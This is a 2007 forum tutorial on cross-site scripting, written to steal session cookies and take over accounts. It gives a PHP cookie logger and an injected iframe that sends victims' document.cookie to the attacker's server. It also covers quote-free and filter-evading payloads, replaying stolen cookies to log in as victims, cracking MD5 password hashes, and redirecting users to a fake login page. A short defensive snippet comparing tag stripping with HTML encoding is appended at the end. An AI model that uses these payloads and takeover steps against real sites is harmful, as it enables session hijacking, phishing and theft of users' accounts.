 Cross Site Scripting (grabbin' the cookie, stealin' the account)
06-06-2007, 01:38 PM   #1
Kyo


Okay, before I post this I would like to mention that this tutorial is old as hell, and wasn't originally written for this forum. It was also 2 parts of one tutorial which I just threw together.

Enjoy:

Read this first!: this guide is for educational purposes only! I won't take responsibility for you running around eMurdering people, okay?

the examples here will not work on neopets, they filter all the methods described below
I do know ways around Neopets filters, I have, in fact, made cookiegrabbers for neopets, but I won't post them just because I don't know if it's fine with the forum admins. (and also: I haven't been on Neopets for ages, these exploits might have been fixed by now.)


Part 1

What do i need to know before i read this tutorial?
basic HTML,
Basic Javascript

What is XSS?
XSS (or Cross Site Scripting) is basically just managing to get javascript on a page.

What is javascript?
javascript is a script language that is run locally. that means the code won't get parsed before it is in your browser. other languages, like PHP, get parsed on the server and output HTML, and nothing but HTML.
but javascript is local. it won't be run, and the code won't be changed before it's on your browser.

Okaaaayyyy... why would i want to put that on a page?
That one is simple. so you can run scripts.
but seriously, you can do great things with javascript. you can steal cookies for example.
Yes. that's right. javascript supports cookies. even tho it won't be run before it's on your browser.

What are cookies, and what flavour?
my favorite. digital.
cookies are, well, strings that are saved on your Computer by websites. only the website who set the cookie (put it on your computer) can read it or edit it.
so sitetwo.com can't read or edit cookies from siteone.com. therefore your cookies are rather safe.

but this is where javascript jumps in. by injecting javascript to a page you can steal cookies. how? easy. you just have to run javascript ON the site that set the cookie.

No shit sherlock, but isn't that... well, IMPOSSIBLE?!?
nothing is impossible. neither is stealing cookies. you just have to find the right places to inject the javascript.
some sites allow you to create lookups. with html. there you can inject javascript that steals cookies, and then everybody who visits your lookup will run the javascript on his browser, and give you his cookies.
you have to be creative. the typical place to inject javascript is the search function. i like to search for "butter<>'"pepper" then i view source and search for the word butter.
now lookups and searches are not the only injectable thing. be creative. every input and GET var (something like ?search=Mysearch or similar) you can find on the site!


now i look if it exists. if it does, then i look if it is inside a tag. then finally i look if <,>,", or ' get replaced or deleted.

if they wont, then i search for <script>alert('Test')</script>, or if it is inside a tag then either for "><script>alert('Test')</script> or '><script>alert('Test')</script>

often the quotes are backslashed. that means " turns to \" and ' turns to \'.

<script>alert(\'Test\')</script> wouldn't work... so what do we do?

well, there are 2 things we CAN do now.

either we replace the quotes inside our javascript with /'s (that will actually work!!!)
so we have <script>alert(/Test/)</script>

OR

we just simply don't USE quotes. but how? well, integers (numbers) don't require quotes in functions, so <script>alert(1)</script> would work, but that isn't really helpful...
or is it?
YES!
Javascript has a number of neat features! one of them is "String.fromCharCode()"!

what does string from char code do? well, it translates numbers into letters.
now, "Test" would become "84,101,115,116"

well, how do i know which number stands for which letter so i can generate my code?

well, i suppose i could tell you, but i am just gonna link a tool i made some time ago:
the string.fromCharCode generator!

this tool turns your text automatically into numbers for string.fromCharCode!!!
good. so we type the word "Test" in the generator.
it outputs:
String.fromCharCode(84,101,115,116)

good, then lets trust that thing and try it!
<script>alert(String.fromCharCode(84,101,115,116)) </script>
Yes! it worked! and it doesn't require any quotes to work AT ALL!!!


we ran javascript on the site!
but hey, wait a minute! how do i grab cookies?
well that you will find out in part 2 of the tutorial, which i am going to write later.





i hope you enjoyed this.
i sure did enjoy writing it. feel free to ask questions.




Part 2

Stop!
before you read this make sure you have read my first part!


do tell, how do i grab cookies?
well, there are many methods. and most of the time PHP is involved.
most of the php scripts use logfiles, some use MySQL, which is the better solution.
but lets stick with logfiles for now. if you want to use MySQL, then learn some php, or get a script from somebody who knows PHP.
Code:
<?php
if($_GET['c']) {
 $file = fopen("log.txt","a");
 fputs($file,$_GET['c']."\r\n\r\n");
 fclose($file);
}
?>
nice code huh?
yeah, but what does it do?
well, that is quite simple.
<? starts the PHP, everything that follows after the <? to the next ?> will not be visible, unless special functions (that are unimportant for us) are used.
if($_GET['c']) checks if cookies were given to the script.
it basically just checks if there is a ?c= in the url.
$file = fopen("log.txt","a") opens the file "log.txt" to write in it
fputs($file,$_GET['c']."\r\n\r\n") writes the cookies that were given to the script in the log.txt
fclose($file) closes the file
} ends the if loop
?> ends the php code

now it will write into the logfile whatever is given to the script per get.
so http://yourwebsite.com/cookiegrabber.php?c=cookies
will write "cookies" in the log.txt

wait... PHP? i thought you could only inject javascript...
you can. but you can't write a logfile with it. and if you could it would be on the wrong server!
so what do we do? we make javascript open an iframe with the PHP and the cookies behind the "c=" thing.

this will look like this (or similar):
c.php is the php script from above.
<script>
document.write("<iframe src='http://www.yoursite.com/c.php?c="+document.cookie+"' width=0 height=0 frameborder=0></iframe>");
</script>

now lets take a look at this.
document.write writes text on the page, unlike alert.
so it writes an iframe on the page. and the page in it is our logger.
now whats that "+document.cookie+" stuff?

well, document.cookie is the cookies of the page in a string. yay, cookies!
"" ends the string that is document.written, and the plus adds something to the string.
so it is iframe src= PLUS cookies PLUS /iframe.

clever. clever indeed.
this will send our cookies to our script which logs them! genius!

but what if quotes are not allowed?
well then we just turn the text into string.fromCharCode and leave the document.cookie as it is.

document.write(String.fromCharCode(Code1)+document.cookie+String.fromCharCode(Code2))

and now we have the cookies of the victim!

Awesome!
Yes, awesome indeed.

But wait... what do i do with the cookies?
you log in.
either you get an extension for firefox that allows you to edit/add cookies and switch your cookies with the grabbed cookies so you are in the account of your victim, or you get opera to do it, OR if you do not want to be caught in other accounts because you have one of your own, or because you do not like lawsuits, then you use a Proxy.

i would suggest my PHP proxy. it works extremely easy with grabbed cookies.

http://www.wocares.com/kyobot.php


just put the cookies you grabbed in the cookies box, the site you grabbed them from in the URL box and there you are in the account of the victim.

another way is, who would have thought, javascript!
go to the site you got the cookies off
then put "javascript:document.cookie='cookie1=data1';document.cookie='cookie2=data2';"
in your bar, replacing cookie1, 2 and data1, 2. you can add as many document.cookie='cookie=data';'s as you want.

i want to edit his profile, but i need his password for that, what do i do?
well, either the password is raw in the cookies which i highly doubt, or it is as MD5 in there. maybe even something else, but MD5 and raw are the most common things
if it is raw just take it and use it. if it is MD5 then get yourself some MD5 cracker. you might not be able to crack it, but there is a chance. good luck.


well, that was awesome, what else can i do with injected javascript?
you can redirect people to sites (like your own site, or a fake login)
lets say you send a victim a URL "http://sitewithxsshole.com/?x=XSS"
the injected code in the URL redirects the victim to your site (http://www.yourevilsite.com/fakelogin.php). now the user saw the right URL in the email/message/whatever so it thinks it is still on sitewithxsshole.com and it logs in. now you have his data.

location.href = "http://newsitetobeon.com"; is the function to redirect.

be creative, do whatever you want!

tags work fine, but <script> gets replaced. what should i do?
filter evasion. either you use event handlers, or you try to trick the filter.

lets say <script> gets replaced by nothing. so does </script>. what do we do?

we trick the filter:
<sc<script>ript> XSS </sc<script>ript>

now the <script>s get deleted, so what is left is <script></script>.
Awesome! this won't work in most cases tho. but that is one way to trick a filter. again, be creative!

now another method is just not to use the script tags.

not to use the script tags?
yes! as i mentioned before: event handlers!

okay, and whats that?
it is basically onsomething="script" in a tag. there are many event handlers, i am just going to go thru one of them.

<body onload="XSS">
is the same as
<script>XSS</script>
with one little exception. if you document.write in an event handler, javascript doesn't know where to write your text. so it overwrites the whole page with your text. this is good if you want to deface something, but bad if you want the user not to notice your exploit. i am going to get back on that later.

wow! 2 different methods to inject javascript! that is so awesome!
well that is not it.
now i want you to do something: copy and paste this in the thing where you put in the URLs in your browser:
javascript:alert('I am javascript too!');

saw it? awesome huh? javascript per URL!
now how do we use this?
either we link it and hope that the user clicks it, or we make the page go there automatically. this can be done using meta refreshes.
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('it worked!');">
wow! another exploit. that is awesome huh?

now some sites have automatic redirection scripts. lets put javascript in there using the same method!

didn't work? i thought so. most sites redirect by manipulating headers. in that case it won't work. but sometimes people use javascript or meta to redirect. then, it will.



i hope you enjoyed, feel free to ask questions!

Last edited by Kyo; 07-22-2007 at 12:50 PM..
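As an added example that is not part of Kyo's post: a constructed strip-once `<script>` filter of the kind the post defeats with `<sc<script>ript>`, beside context-aware HTML encoding, both run over the post's own probe string and payloads. `renderSearchPage` and `reflectsActiveMarkup` are assumed stand-ins for the vulnerable search form and for a reviewer's check of its output.

```javascript
// Added example, not from the original post: a constructed strip-once
// "<script>" filter of the kind the post defeats with <sc<script>ript>,
// beside context-aware HTML encoding, run over the post's own payloads.

// Payloads quoted from the post (the alert argument is the post's
// quote-free String.fromCharCode form of "Test").
const PROBE = "butter<>'\"pepper";
const NESTED = "<sc<script>ript>alert(1)</sc<script>ript>";
const ATTR_BREAKOUT =
  "\"><script>alert(String.fromCharCode(84,101,115,116))</script>";

// The filter the post describes: one pass that deletes every literal
// <script> and </script>. Stripping is a blacklist, and what is left
// after the deletion is never checked again.
function stripScriptTags(input) {
  return input.replace(/<\/?script>/gi, "");
}

// Encoding for HTML text and for double- or single-quoted attribute
// values: the five characters that can end a text node, a tag or an
// attribute become entities, so nothing reflected is parsed as markup,
// whether or not the payload uses quotes.
function encodeHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;",
                '"': "&quot;", "'": "&#x27;" };
  return input.replace(/[&<>"']/g, (ch) => map[ch]);
}

// Assumed stand-in for the search page in the post: reflects the term
// once inside a quoted attribute and once in the body, after applying
// the defence under test.
function renderSearchPage(term, sanitize) {
  const safe = sanitize(term);
  return '<input value="' + safe + '">' +
         "<p>Results for " + safe + "</p>";
}

// Did the reflected term survive as active markup? Either a <script>
// tag is present, or the double-quote count differs from the two in the
// template, meaning the value attribute was closed early.
function reflectsActiveMarkup(html) {
  const quotes = (html.match(/"/g) || []).length;
  return /<script>/i.test(html) || quotes !== 2;
}
```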